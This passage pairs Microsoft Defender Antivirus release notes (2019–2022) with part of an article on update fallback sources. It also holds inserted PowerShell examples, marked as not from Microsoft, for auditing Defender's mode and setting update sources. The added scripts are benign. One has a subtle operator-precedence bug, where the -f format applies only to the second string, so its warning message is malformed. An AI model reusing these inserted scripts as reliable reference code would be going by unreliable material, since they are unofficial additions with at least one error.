Fixed a deadlock related to updating \device\cdrom* exclusions upon mounting a
cdrom drive under certain conditions
Improved PID information for threat detection

Known Issues
None

September-2022 (Platform: 4.18.2209.7 | Engine: 1.1.19700.3)
Security intelligence update version: 1.377.8.0
Release date: October 10, 2022
Platform: 4.18.2209.7
Engine: 1.1.19700.3
Support phase: Technical upgrade support (only)

What's new
Improved processing of Defender fallback order on Server SKU
Fixed Defender updates during OOBE process
Fixed Trusted Installer security descriptor vulnerability
Fixed Microsoft Defender Antivirus exclusions visibility
Fixed output of fallback order of the PowerShell cmdlet
Fixed Defender Platform update failure on Server Core 2019 SKUs
Improved hardening support for Defender disablement configurations on Server
SKUs
Improved Defender configuration logics for tamper protection on servers
Improved WARN mode for ASR rule
Improved certificate handling of OSX
Improved logging for scanning FilesStash location
Beginning with platform version 4.18.2208.0 and later: If a server has been
onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender"
group policy setting no longer completely disables Windows Defender Antivirus
on Windows Server 2012 R2 and later operating systems. Instead, the setting is either
ignored (if ForceDefenderPassiveMode is configured explicitly) or it places
Microsoft Defender Antivirus into passive mode (if ForceDefenderPassiveMode isn't
configured). Moreover, tamper protection allows a switch to active mode by
changing ForceDefenderPassiveMode to 0, but not a switch to passive mode. These changes
apply only to servers onboarded to Microsoft Defender for Endpoint. For more
information, see Microsoft Defender Antivirus compatibility with other
security products
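The following PowerShell is an added example, not part of the Microsoft article, for checking which mode Microsoft Defender Antivirus actually ended up in on a server after this behaviour change. It uses only properties of Get-MpComputerStatus (AMRunningMode, IsTamperProtected, RealTimeProtectionEnabled, AMProductVersion, AntivirusSignatureVersion); the expected-mode string you pass in is your own choice, and the mode strings listed in the comment are assumed to match what the cmdlet reports on your build.

```powershell
# Added example (not from the Microsoft article): audit the running mode of
# Microsoft Defender Antivirus on a server onboarded to Defender for Endpoint
# and flag a mismatch against the mode you expect. Run in an elevated console.

function Test-DefenderRunningMode {
    param(
        # Expected AMRunningMode value. Values observed from Get-MpComputerStatus
        # (assumed, check your build): "Normal", "Passive Mode", "EDR Block Mode",
        # "SxS Passive Mode", "Not running".
        [Parameter(Mandatory)]
        [string]$ExpectedMode
    )

    $status = Get-MpComputerStatus

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        AMRunningMode      = $status.AMRunningMode
        TamperProtected    = $status.IsTamperProtected
        RealTimeProtection = $status.RealTimeProtectionEnabled
        PlatformVersion    = $status.AMProductVersion
        SignatureVersion   = $status.AntivirusSignatureVersion
        ExpectedMode       = $ExpectedMode
        Compliant          = ($status.AMRunningMode -eq $ExpectedMode)
    }
}

# A server that should run Defender as the primary (active) antivirus.
$result = Test-DefenderRunningMode -ExpectedMode "Normal"
$result | Format-List

if (-not $result.Compliant) {
    $msg = "Defender is in '{0}' but '{1}' was expected. Check the ForceDefenderPassiveMode " +
           "policy and whether a non-Microsoft antivirus is registered." `
           -f $result.AMRunningMode, $result.ExpectedMode
    Write-Warning $msg
}
```

Because tamper protection only permits a switch to active mode and not to passive mode, a server that reports "Passive Mode" here while you expect "Normal" is worth investigating: either ForceDefenderPassiveMode is explicitly set, or another antivirus product is registered on the host.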

Known Issues
Some customers might have received platform update 4.18.2209.2 from preview.
It can cause the service to get stuck in the starting state after the update.

August-2022 (Platform: 4.18.2207.7 | Engine: 1.1.19600.3)
Security intelligence update version: 1.373.1647.0
Release date: September 6, 2022
Platform: 4.18.2207.7
Engine: 1.1.19600.3
Support phase: Technical upgrade support (only)

What's new
Starting with platform version 4.18.2207.7, the default behavior of dynamic
signature expiration reporting changes to reduce potential 2011 event notification
flooding. See: Event ID: 2011 in Review event logs and error codes to troubleshoot
issues with Microsoft Defender Antivirus
Fixed Unified agent installer issues on WS2012R2 Server and Windows Server 2016
Fixed remediation issue for custom detection
Fixed Race condition related to behavior monitoring
Resolved multiple deadlock scenarios in Defender dlls
Improved frequency of Windows toasts notification for ASR rules

Known Issues
None

July-2022 (Platform: 4.18.2207.5 | Engine: 1.1.19500.2)
Security intelligence update version: 1.373.219.0
Release date: August 15, 2022
Platform: 4.18.2207.5
Engine: 1.1.19500.2
Support phase: Technical upgrade support (only)

What's new
Performance improvement for hybrid sleep delay when Microsoft Defender
Antivirus is active
Fixed client detection behavior related to custom certificate blocking indicators of
compromise
Performance improvement for AntiMalware Scan Interface (AMSI) caching
Improved detection and remediation for Microsoft Visual Basic for Applications
(VBA) related macros
Improved processing of AMSI exclusions
Fixed deadlock detection in Host Intrusion Prevention System (HIPS) rule
processing. (For more information about HIPS and Defender for Endpoint, see
Migrating from a third-party HIPS to ASR rules.)
Fixed memory leak where MsMpEng.exe was consuming private bytes. (If high CPU
usage is also an issue, see High CPU usage due to Microsoft Defender Antivirus)
Fixed deadlock with behavior monitoring
Improved trust validation
Fixed engine crash issue on legacy operating platforms
Performance Analyzer v3 updates: Added top path support, scan skip information,
and OnDemand scan support. See Performance analyzer for Microsoft Defender
Antivirus.
Defender performance improvements during file copy operations
Added improvements for troubleshooting mode
Added fix for Defender WINEVT channels across update/restarts. (For more
information about WINEVT, see Windows Event Log.)
Added fix for Defender WMI management bug during startup/updates
Added fix for duplicated 2010/2011 in the Windows Event Viewer Operational
events
Added support for Defender for Endpoint stack processes token hardening

Known Issues
Customers deploying platform update 4.18.2207.5 might experience lagging
network performance that could impact applications.

May-2022 (Platform: 4.18.2205.7 | Engine: 1.1.19300.2)
Security intelligence update version: 1.369.88.0
Released: June 22, 2022
Platform: 4.18.2205.7
Engine: 1.1.19300.2
Support phase: Technical upgrade support (only)

What's new
Added fix for ETW channel configuration for updates
Added support for contextual exclusions allowing more specific exclusion targeting
Fixed context maximum size
Added fix for ASR LSASS detection
Added fix to SHSetKnownFolder for rule exclusion logic
Added AMSI disk usage limits for The History Store
Added fix for Defender service refusing to accept signature updates

Known issues
None

March-2022 UPDATE (Platform: 4.18.2203.5 | Engine: 1.1.19200.5)
Customers who applied the March 2022 Microsoft Defender engine update (1.1.19100.5)
might have encountered high resource utilization (CPU and/or memory). Microsoft has
released an update (1.1.19200.5) that resolves the bugs introduced in the earlier version.
Customers are recommended to update to at least this new engine build (1.1.19200.5).
To ensure any performance issues are fully fixed, it's recommended to reboot machines
after applying the update.

Security intelligence update version: 1.363.817.0
Released: April 22, 2022
Platform: 4.18.2203.5
Engine: 1.1.19200.5
Support phase: Technical upgrade support (only)

What's new
Resolves issues with high resource utilization (CPU and/or memory) related to the
earlier March 2022 Microsoft Defender engine update (1.1.19100.5)

Known issues
None

March-2022 (Platform: 4.18.2203.5 | Engine: 1.1.19100.5)
Security intelligence update version: 1.361.1449.0
Released: April 7, 2022
Platform: 4.18.2203.5
Engine: 1.1.19100.5
Support phase: Technical upgrade support (only)

What's new
Added fix for an attack surface reduction rule that blocked an Outlook add-in
Added fix for a behavior monitoring performance issue related to short-lived
processes
Added fix for AMSI exclusion
Improved tamper protection capabilities
Added a fix for real-time protection getting disabled in some cases when using the
SharedSignaturesPath config. For more information about the SharedSignaturesPath
parameter, see Set-MpPreference.

Known issues
Potential for high resource utilization (CPU and/or memory). See the Platform
4.18.2203.5 and Engine 1.1.19200.5 update for March 2022.

February-2022 (Platform: 4.18.2202.4 | Engine: 1.1.19000.8)
Security intelligence update version: 1.361.14.0
Released: March 14, 2022
Platform: 4.18.2202.4
Engine: 1.1.19000.8
Support phase: Technical upgrade support (only)

What's new
Improvements to detection and behavior monitoring logic
Fixed false positive triggering attack surface reduction detections
Added fix resulting in better fidelity of EDR and Advanced Hunting detection alerts
Defender no longer supports custom notifications on toast pop ups. Modified
GPO/Intune/SCCM and docs to reflect this change.
Improvements to capture both information and copy of files written to removable
storage.
Improved traffic output when SmartScreen service is unreachable
Connectivity improvements for customers using proxies with authentication
requirements
Fixed VDI device update bug for network FileShares
EDR in block mode now supports granular device targeting with new CSPs. See
Endpoint detection and response (EDR) in block mode.

Known issues
None

January-2022 (Platform: 4.18.2201.10 | Engine: 1.1.18900.2)
Security intelligence update version: 1.357.8.0
Released: February 9, 2022
Platform: 4.18.2201.10
Engine: 1.1.18900.2
Support phase: Technical upgrade support (only)

What's new
Behavior monitoring improvements in filtering performance
Hardening to TrustedInstaller
Tamper protection improvements
Replaced ScanScheduleTime with the new ScanScheduleOffset setting in
Set-MpPreference. This policy configures the number of minutes after midnight to
perform a scheduled scan.
Added the -ServiceHealthReportInterval setting to Set-MpPreference. This policy
configures the time interval (in minutes) to perform a scheduled scan.
Added the AllowSwitchToAsyncInspection setting to Set-MpPreference. This policy
enables a performance optimization that allows synchronously inspected network
flows to switch to async inspection once they've been checked and validated.
Performance Analyzer v2 updates: Remote PowerShell and PowerShell 7.x support
added. See Performance analyzer for Microsoft Defender Antivirus.
Fixed potential duplicate packet bug in Microsoft Defender Antivirus network
inspection system driver.

Known issues
None

November-2021 (Platform: 4.18.2111.5 | Engine: 1.1.18800.4)
Security intelligence update version: 1.355.2.0
Released: December 9th, 2021
Platform: 4.18.2111.5
Engine: 1.1.18800.4
Support phase: Technical upgrade support (only)
What's new
Improved CPU usage efficiency of certain intensive scenarios on Exchange servers
Added new device control status fields under Get-MpComputerStatus in Defender
PowerShell module.
Fixed bug in which SharedSignatureRoot value couldn't be removed when set with
PowerShell
Fixed bug in which tamper protection failed to be enabled, even though Microsoft
Defender for Endpoint indicated that tamper protection was turned on
Added supportability and bug fixes to performance analyzer for Microsoft
Defender Antivirus tool. For more information, see Performance analyzer for
Microsoft Defender Antivirus.
PowerShell ISE support added for New-MpPerformanceRecording
Fixed bug errors for Get-MpPerformanceReport -TopFilesPerProcess
Fixed performance recording session leak when using
New-MpPerformanceRecording in PowerShell 7.x, remote sessions, and PowerShell ISE

Known issues
None

October-2021 (Platform: 4.18.2110.6 | Engine: 1.1.18700.4)
Security intelligence update version: 1.353.3.0
Released: October 28th, 2021
Platform: 4.18.2110.6
Engine: 1.1.18700.4
Support phase: Technical upgrade support (only)

What's new
Improvements to file transfer protocol (FTP) network traffic coverage
Fix to reduce Microsoft Defender CPU usage in Exchange Server running on
Windows Server 2016
Fix for scan interruptions
Fix for alerts on blocked tampering attempts not appearing in Security Center
Improvements to tamper resilience in Microsoft Defender service
Known issues
None

September-2021 (Platform: 4.18.2109.6 | Engine: 1.1.18600.4)
Security intelligence update version: 1.351.7.0
Released: October 7th, 2021
Platform: 4.18.2109.6
Engine: 1.1.18600.4
Support phase: Technical upgrade support (only)

What's new
New delay ring for Microsoft Defender Antivirus engine and platform updates.
Devices that opt into this ring receive updates with a 48-hour delay. The new
delay ring is suggested for critical environments only. See Manage the gradual
rollout process for Microsoft Defender updates.
Improvements to Microsoft Defender update gradual rollout process

Known issues
None

August-2021 (Platform: 4.18.2108.7 | Engine: 1.1.18500.10)
Security intelligence update version: 1.349.22.0
Released: September 2, 2021
Platform: 4.18.2108.7
Engine: 1.1.18500.10
Support phase: Technical upgrade support (only)

What's new
Improvements to the behavior monitoring engine
Released new performance analyzer for Microsoft Defender Antivirus
Microsoft Defender Antivirus hardened against loading malicious DLLs
Microsoft Defender Antivirus hardened against the TrustedInstaller bypass
Extending file change notifications to include more data for Human-Operated
Ransomware (HumOR)

Known issues
None

July-2021 (Platform: 4.18.2107.4 | Engine: 1.1.18400.4)
Security intelligence update version: 1.345.13.0
Released: August 5, 2021
Platform: 4.18.2107.4
Engine: 1.1.18400.4
Support phase: Technical upgrade support (only)

What's new
Device control support added for Windows Portable Devices
Potentially unwanted applications (PUA) protection is turned on by default for
consumers (See Block potentially unwanted applications with Microsoft Defender
Antivirus.)
Scheduled scans for Group Policy Object managed systems adhere to user
configured scan time
Improvements to the behavior monitoring engine

Known issues
None

June-2021 (Platform: 4.18.2106.5 | Engine: 1.1.18300.4)
Security intelligence update version: 1.343.17.0
Released: June 28, 2021
Platform: 4.18.2106.5
Engine: 1.1.18300.4
Support phase: Technical upgrade support (only)
What's new
New controls for managing the gradual rollout process of Microsoft Defender
updates. See Manage the gradual rollout process for Microsoft Defender updates.
Improvement to the behavior monitoring engine
Improvements to the rollout of antimalware definitions
Extended Microsoft Edge network event inspections

Known issues
None

May-2021 (Platform: 4.18.2105.4 | Engine: 1.1.18200.4)
Security intelligence update version: 1.341.8.0
Released: June 3, 2021
Platform: 4.18.2105.4
Engine: 1.1.18200.4
Support phase: Technical upgrade support (only)

What's new
Improvements to behavior monitoring
Fixed network protection notification filtering feature

Known issues
None

April-2021 (Platform: 4.18.2104.14 | Engine: 1.1.18100.5)
Security intelligence update version: 1.337.2.0
Released: April 26, 2021 (Engine: 1.1.18100.6 released May 5, 2021)
Platform: 4.18.2104.14
Engine: 1.1.18100.5
Support phase: Technical upgrade support (only)
What's new
More behavior monitoring logic
Improved kernel mode key logger detection
Added new controls to manage the gradual rollout process for Microsoft Defender
updates

Known issues
None

March-2021 (Platform: 4.18.2103.7 | Engine: 1.1.18000.5)
Security intelligence update version: 1.335.36.0
Released: April 2, 2021
Platform: 4.18.2103.7
Engine: 1.1.18000.5
Support phase: Technical upgrade support (only)

What's new
Improvement to the Behavior Monitoring engine
Expanded network brute-force-attack mitigations
Generates more events for failed tampering attempts when Tamper Protection is
enabled

Known issues
None

February-2021 (Platform: 4.18.2102.3 | Engine: 1.1.17900.7)
Security intelligence update version: 1.333.7.0
Released: March 9, 2021
Platform: 4.18.2102.3
Engine: 1.1.17900.7
Support phase: Technical upgrade support (only)
What's new
Improved service recovery through tamper protection
Extended tamper protection scope

Known issues
None

January-2021 (Platform: 4.18.2101.9 | Engine: 1.1.17800.5)
Security intelligence update version: 1.327.1854.0
Released: February 2, 2021
Platform: 4.18.2101.9
Engine: 1.1.17800.5
Support phase: Technical upgrade support (only)

What's new
Shellcode exploit detection improvements
Increased visibility for credential stealing attempts
Improvements in antitampering features in Microsoft Defender Antivirus services
Improved support for ARM x64 emulation
Fix: EDR Block notification remains in threat history after real-time protection
performed initial detection

Known issues
None

November-2020 (Platform: 4.18.2011.6 | Engine: 1.1.17700.4)
Security intelligence update version: 1.327.1854.0
Released: December 03, 2020
Platform: 4.18.2011.6
Engine: 1.1.17700.4
Support phase: Technical upgrade support (only)
What's new
Improved SmartScreen status support logging

Known issues
None

October-2020 (Platform: 4.18.2010.7 | Engine: 1.1.17600.5)
Security intelligence update version: 1.327.7.0
Released: October 29, 2020
Platform: 4.18.2010.7
Engine: 1.1.17600.5
Support phase: Technical upgrade support (only)

What's new
New descriptions for special threat categories
Improved emulation capabilities
Improved host address allow/block capabilities
New option in Defender CSP to Ignore merging of local user exclusions

Known issues
None

September-2020 (Platform: 4.18.2009.7 | Engine: 1.1.17500.4)
Security intelligence update version: 1.325.10.0
Released: October 01, 2020
Platform: 4.18.2009.7
Engine: 1.1.17500.4
Support phase: Technical upgrade support (only)

What's new
Admin permissions are required to restore files in quarantine
XML formatted events are now supported
CSP support for ignoring exclusion merges
New management interfaces for:
UDP Inspection
Network Protection on Server 2019
IP Address exclusions for Network Protection
Improved visibility into TPM measurements
Improved Office VBA module scanning

Known issues
None

August-2020 (Platform: 4.18.2008.9 | Engine: 1.1.17400.5)
Security intelligence update version: 1.323.9.0
Released: August 27, 2020
Platform: 4.18.2008.9
Engine: 1.1.17400.5
Support phase: Technical upgrade support (only)

What's new
Added more telemetry events
Improved scan event telemetry
Improved behavior monitoring for memory scans
Improved macro streams scanning
Added AMRunningMode to Get-MpComputerStatus PowerShell cmdlet
DisableAntiSpyware is ignored. Microsoft Defender Antivirus automatically turns
itself off when it detects another antivirus program.

Known issues
None

July-2020 (Platform: 4.18.2007.8 | Engine: 1.1.17300.4)
Security intelligence update version: 1.321.30.0
Released: July 28, 2020
Platform: 4.18.2007.8
Engine: 1.1.17300.4
Support phase: Technical upgrade support (only)

What's new
Improved telemetry for BITS
Improved Authenticode code signing certificate validation

Known issues
None

June-2020 (Platform: 4.18.2006.10 | Engine: 1.1.17200.2)
Security intelligence update version: 1.319.20.0
Released: June 22, 2020
Platform: 4.18.2006.10
Engine: 1.1.17200.2
Support phase: Technical upgrade support (only)

What's new
Added the ability to specify the location of the support logs
Skip the aggressive catch-up scan in passive mode
Allow Defender to update on metered connections
Fixed performance tuning when caching is disabled
Fixed registry query
Fixed scan-time randomization in ADMX

Known issues
None

May-2020 (Platform: 4.18.2005.4 | Engine: 1.1.17100.2)
Security intelligence update version: 1.317.20.0
Released: May 26, 2020
Platform: 4.18.2005.4
Engine: 1.1.17100.2
Support phase: Technical upgrade support (only)

What's new
Improved logging for scan events
Improved user mode crash handling.
Added event tracing for Tamper protection
Fixed AMSI Sample submission
Fixed AMSI Cloud blocking
Fixed Security update install log

Known issues
None

April-2020 (Platform: 4.18.2004.6 | Engine: 1.1.17000.2)
Security intelligence update version: 1.315.12.0
Released: April 30, 2020
Platform: 4.18.2004.6
Engine: 1.1.17000.2
Support phase: Technical upgrade support (only)

What's new
WDFilter improvements
Added more actionable event data to attack surface reduction detection events
Fixed version information in diagnostic data and WMI
Fixed incorrect platform version in UI after platform update
Dynamic URL intel for fileless threat protection
UEFI scan capability
Extended logging for updates

Known issues
None

March-2020 (Platform: 4.18.2003.8 | Engine: 1.1.16900.2)
Security intelligence update version: 1.313.8.0
Released: March 24, 2020
Platform: 4.18.2003.8
Engine: 1.1.16900.4
Support phase: Technical upgrade support (only)

What's new
CPU throttling option added to MpCmdRun
Improved diagnostic capability
Reduced security intelligence timeout (5 min)
Extended AMSI engine internal log capability
Improved notification for process blocking

Known issues
[Fixed] Microsoft Defender Antivirus is skipping files when running a scan.

February-2020 (Platform: - | Engine: 1.1.16800.2)

Security intelligence update version: 1.311.4.0
Released: February 25, 2020
Platform/Client: -
Engine: 1.1.16800.2
Support phase: Technical upgrade support (only)

What's new
None
Known issues
None

January-2020 (Platform: 4.18.2001.10 | Engine: 1.1.16700.2)
Security intelligence update version: 1.309.32.0
Released: January 30, 2020
Platform/Client: 4.18.2001.10
Engine: 1.1.16700.2
Support phase: Technical upgrade support (only)

What's new
Fixed BSOD on WS2016 with Exchange
Support platform updates when TMP is redirected to a network path
Platform and engine versions are added to WDSI
Extended emergency signature updates to passive mode
Fixed 4.18.1911.3 hang

Known issues
[Fixed] Devices utilizing modern standby mode may experience a hang with the
Windows Defender filter driver that results in a gap of protection. Affected
machines appear to the customer as not having updated to the latest antimalware
platform.

Important

This update is:

needed by RS1 devices running a lower version of the platform to support SHA2;
has a reboot flag for systems that have hanging issues;
is re-released in April 2020 and will not be superseded by newer updates, to
keep future availability;
is categorized as an update due to the reboot requirement; and
is only offered through Windows Update.

November-2019 (Platform: 4.18.1911.3 | Engine: 1.1.16600.7)
Security intelligence update version: 1.307.13.0
Released: December 7, 2019
Platform: 4.18.1911.3
Engine: 1.1.17000.7
Support phase: No support

What's new
Fixed MpCmdRun tracing level
Fixed WDFilter version info
Improved notifications (PUA)
Added MRT logs to support files

Known issues
When this update is installed, the device needs the jump package 4.18.2001.10 to
be able to update to the latest platform version.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Manage the sources for Microsoft Defender Antivirus protection updates
Article • 08/28/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Keeping your antivirus protection up to date is critical. There are two components to
managing protection updates for Microsoft Defender Antivirus:

Where the updates are downloaded from; and
When updates are downloaded and applied.

This article describes how to specify from where updates should be downloaded (this
specification is also known as the fallback order). See the Manage Microsoft Defender
Antivirus updates and apply baselines article for an overview of how updates work and
how to configure other aspects of updates (such as scheduling updates).

Important

Microsoft Defender Antivirus security intelligence updates and platform updates
are delivered through Windows Update, and starting Monday, October 21, 2019, all
security intelligence updates are SHA-2 signed exclusively. Your devices must be
updated to support SHA-2 in order to update your security intelligence. To learn
more, see 2019 SHA-2 Code Signing Support requirement for Windows and
WSUS.

Fallback order
Typically, you configure endpoints to individually download updates from a primary source followed by other sources in order of priority, based on your network configuration. Updates are obtained from sources in the order you specify. If updates from the current source are out-of-date, the next source in the list is used immediately.
When updates are published, some logic is applied to minimize the size of the update. In most cases, only the differences between the latest update and the update that is currently installed on the device (the set of differences is referred to as the delta) are downloaded and applied. However, the size of the delta depends on two main factors:

The age of the last update on the device; and
The source used to download and apply updates.

The older the updates on an endpoint, the larger the download is. However, you must also consider download frequency. A more frequent update schedule can result in more network usage, whereas a less-frequent schedule can result in larger file sizes per download.

There are five locations where you can specify where an endpoint should obtain updates:

Microsoft Update
Windows Server Update Service (See note 1 below)
Microsoft Endpoint Configuration Manager
Network file share
Security intelligence updates for Microsoft Defender Antivirus and other Microsoft anti-malware (See note 2 below)

Note

1. Intune Internal Definition Update Server. If you use SCCM/SUP to get definition updates for Microsoft Defender Antivirus, and you must access Windows Update on blocked client devices, you can transition to co-management and offload the endpoint protection workload to Intune. In the antimalware policy configured in Intune there is an "internal definition update server" option that you can set to use on-premises WSUS as the update source. This configuration helps you control which updates from the official WU server are approved for the enterprise, and also helps proxy and save network traffic to the official Windows Updates network.

2. Your policy and registry might have this listed as Microsoft Malware Protection Center (MMPC) security intelligence, its former name.

To ensure the best level of protection, Microsoft Update allows for rapid releases, which
means smaller downloads on a frequent basis. The Windows Server Update Service,
Microsoft Endpoint Configuration Manager, Microsoft security intelligence updates, and
platform updates sources deliver less frequent updates. Thus, the delta might be larger,
resulting in larger downloads.

Platform updates contain engine updates and are released on a monthly cadence.
Security intelligence updates are also delivered multiple times a day, but this package
doesn't contain an engine. See Microsoft Defender Antivirus security intelligence and
product updates.

Important

If you have set Microsoft Security intelligence page updates as a fallback source
after Windows Server Update Service or Microsoft Update, updates are only
downloaded from security intelligence updates and platform updates when the
current update is considered out-of-date. (By default, this is seven consecutive days
of not being able to apply updates from the Windows Server Update Service or
Microsoft Update services). You can, however, set the number of days before
protection is reported as out-of-date.

Starting Monday, October 21, 2019, security intelligence updates and platform
updates are SHA-2 signed exclusively. Devices must be updated to support SHA-2
in order to get the latest security intelligence updates and platform updates. To
learn more, see 2019 SHA-2 Code Signing Support requirement for Windows and
WSUS .

Each source has typical scenarios that depend on how your network is configured, in addition to how often they publish updates, as described in the following table:

Location: Windows Server Update Service
Sample scenario: You're using Windows Server Update Service to manage updates for your network.

Location: Microsoft Update
Sample scenario: You want your endpoints to connect directly to Microsoft Update. This option is useful for endpoints that irregularly connect to your enterprise network, or if you don't use Windows Server Update Service to manage your updates.

Location: File share
Sample scenario: You have non-Internet-connected devices (such as VMs). You can use your Internet-connected VM host to download the updates to a network share, from which the VMs can obtain the updates. See the VDI deployment guide for how file shares are used in virtual desktop infrastructure (VDI) environments.

Location: Microsoft Configuration Manager
Sample scenario: You're using Microsoft Configuration Manager to update your endpoints.

Location: Security intelligence updates and platform updates for Microsoft Defender Antivirus and other Microsoft anti-malware (formerly referred to as MMPC)
Sample scenario: Make sure your devices are updated to support SHA-2. Microsoft Defender Antivirus Security intelligence and platform updates are delivered through Windows Update, and starting Monday October 21, 2019 security intelligence updates and platform updates are SHA-2 signed exclusively. Download the latest protection updates because of a recent infection or to help provision a strong, base image for VDI deployment. This option should generally be used only as a final fallback source, and not the primary source. It's only used if updates can't be downloaded from Windows Server Update Service or Microsoft Update for a specified number of days.

You can manage the order in which update sources are used with Group Policy,
Microsoft Endpoint Configuration Manager, PowerShell cmdlets, and WMI.

Important

If you set Windows Server Update Service as a download location, you must
approve the updates, regardless of the management tool you use to specify the
location. You can set up an automatic approval rule with Windows Server Update
Service, which might be useful as updates arrive at least once a day. To learn more,
see synchronize endpoint protection updates in standalone Windows Server
Update Service.

The procedures in this article first describe how to set the order, and then how to set up
the File share option if you have enabled it.

Use Group Policy to manage the update location
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the Group Policy Object you want to configure and then select Edit.

2. In the Group Policy Management Editor, go to Computer configuration.

3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Windows Defender > Signature updates and then configure the following settings:

a. Edit the Define the order of sources for downloading security intelligence updates setting. Set the option to Enabled.

b. Specify the order of sources, separated by a single pipe, for example: InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC, as shown in the following screenshot.

c. Select OK. This action sets the order of protection update sources.

d. Edit the Define file shares for downloading security intelligence updates setting and then set the option to Enabled.

e. Specify the file share source. If you have multiple sources, specify each source in the order they should be used, separated by a single pipe. Use standard UNC notation for denoting the path, for example: \\host-name1\share-name\object-name|\\host-name2\share-name\object-name. If you don't enter any paths, then this source is skipped when the VM downloads updates.

f. Select OK. This action sets the order of file shares when that source is referenced in the Define the order of sources... group policy setting.

Note

For Windows 10, versions 1703 up to and including 1809, the policy path is Windows Components > Microsoft Defender Antivirus > Signature Updates. For Windows 10, version 1903, the policy path is Windows Components > Microsoft Defender Antivirus > Security Intelligence Updates.

Use Configuration Manager to manage the update location
See Configure Security intelligence Updates for Endpoint Protection for details on configuring Microsoft Configuration Manager (current branch).

Use PowerShell cmdlets to manage the update location
Use the following PowerShell cmdlets to set the update order.

PowerShell

Set-MpPreference -SignatureFallbackOrder {LOCATION|LOCATION|LOCATION|LOCATION}
Set-MpPreference -SignatureDefinitionUpdateFileSharesSource {\\UNC SHARE PATH|\\UNC SHARE PATH}

See the following articles for more information:

Set-MpPreference -SignatureFallbackOrder
Set-MpPreference -SignatureDefinitionUpdateFileSharesSource
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus
Defender Antivirus cmdlets
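
The following script is an added example and is not part of the Microsoft article. It sets the fallback order with Set-MpPreference, validates the value against the source names the cmdlet accepts (InternalDefinitionUpdateServer, MicrosoftUpdateServer, MMPC, FileShares), reads the effective value back with Get-MpPreference, and then checks the age of the installed security intelligence against the seven-day out-of-date default described earlier. The chosen order is an assumption for the example; run it in an elevated PowerShell session on a device with Microsoft Defender Antivirus.

```powershell
# Added example (not from the Microsoft article): set and verify the security
# intelligence fallback order, then flag protection older than the 7-day default.

# Assumed order: internal WSUS/Configuration Manager first, Microsoft Update second,
# the MMPC download site as the final fallback.
$fallbackOrder = 'InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC'

# Days after which the article says protection is reported as out of date.
$outOfDateDays = 7

function Set-DefenderFallbackOrder {
    param([Parameter(Mandatory)][string]$Order)

    # Reject anything that is not a pipe-separated list of the known source names,
    # so a typo in a management script cannot leave a device with no usable source.
    $allowed = 'InternalDefinitionUpdateServer', 'MicrosoftUpdateServer', 'MMPC', 'FileShares'
    foreach ($source in ($Order -split '\|')) {
        if ($allowed -notcontains $source) {
            throw "Unknown update source '$source'. Allowed: $($allowed -join ', ')"
        }
    }

    Set-MpPreference -SignatureFallbackOrder $Order

    # Read the effective value back instead of trusting that the call succeeded.
    $effective = (Get-MpPreference).SignatureFallbackOrder
    if ($effective -ne $Order) {
        throw "Fallback order was not applied. Effective value: '$effective'"
    }
    Write-Host "Fallback order is now: $effective"
}

function Test-DefenderSignatureFreshness {
    param([int]$MaxAgeDays = 7)

    $status = Get-MpComputerStatus
    # AntivirusSignatureAge is the age in days of the installed security intelligence.
    $age = $status.AntivirusSignatureAge
    [pscustomobject]@{
        SignatureVersion = $status.AntivirusSignatureVersion
        LastUpdated      = $status.AntivirusSignatureLastUpdated
        AgeDays          = $age
        OutOfDate        = ($age -ge $MaxAgeDays)
    }
}

Set-DefenderFallbackOrder -Order $fallbackOrder

$fresh = Test-DefenderSignatureFreshness -MaxAgeDays $outOfDateDays
$fresh | Format-List

if ($fresh.OutOfDate) {
    # Pull an update through the first source in the order that works, then re-check.
    Write-Warning "Security intelligence is $($fresh.AgeDays) days old; updating now."
    Update-MpSignature
    Test-DefenderSignatureFreshness -MaxAgeDays $outOfDateDays | Format-List
}
```

Reading the value back matters because Set-MpPreference does not fail when a policy (Group Policy, Intune, or Configuration Manager) already controls the setting; the policy value wins and the script would otherwise report success for a change that never took effect.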

Use Windows Management Instrumentation (WMI) to manage the update location
Use the Set method of the MSFT_MpPreference class for the following properties:
WMI

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSource

See the following articles for more information:

Windows Defender WMIv2 APIs
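
The following script is an added example and is not part of the Microsoft article. It uses the MSFT_MpPreference and MSFT_MpComputerStatus classes over CIM to audit the update-source settings of several devices at once, and corrects the fallback order where it differs from the expected value by calling the class's static Set method, which is what a management agent does when the Defender PowerShell module is not available. The WMI namespace root/Microsoft/Windows/Defender is where the Defender WMIv2 classes are registered; the computer names and the expected order are placeholders.

```powershell
# Added example (not from the Microsoft article): fleet audit of update sources over
# WMI/CIM, with remediation through MSFT_MpPreference.Set.

$namespace     = 'root/Microsoft/Windows/Defender'       # Defender WMIv2 namespace
$computers     = 'WORKSTATION01', 'WORKSTATION02'         # placeholders
$expectedOrder = 'InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC'  # assumed

function Get-DefenderUpdateSourceReport {
    param([string[]]$ComputerName, [string]$ExpectedOrder)

    foreach ($name in $ComputerName) {
        try {
            $session = New-CimSession -ComputerName $name -ErrorAction Stop
            $pref    = Get-CimInstance -CimSession $session -Namespace $namespace -ClassName MSFT_MpPreference
            $status  = Get-CimInstance -CimSession $session -Namespace $namespace -ClassName MSFT_MpComputerStatus
            Remove-CimSession $session

            [pscustomobject]@{
                Computer      = $name
                FallbackOrder = $pref.SignatureFallbackOrder
                FileShares    = $pref.SignatureDefinitionUpdateFileSharesSource
                SignatureAge  = $status.AntivirusSignatureAge   # days
                Compliant     = ($pref.SignatureFallbackOrder -eq $ExpectedOrder)
            }
        } catch {
            # Unreachable devices are reported as non-compliant rather than skipped,
            # so they do not silently drop out of the audit.
            [pscustomobject]@{
                Computer = $name; FallbackOrder = $null; FileShares = $null
                SignatureAge = $null; Compliant = $false
            }
        }
    }
}

function Set-DefenderFallbackOrderViaWmi {
    param([string]$ComputerName, [string]$Order)

    # MSFT_MpPreference.Set is a static method: only the properties passed in
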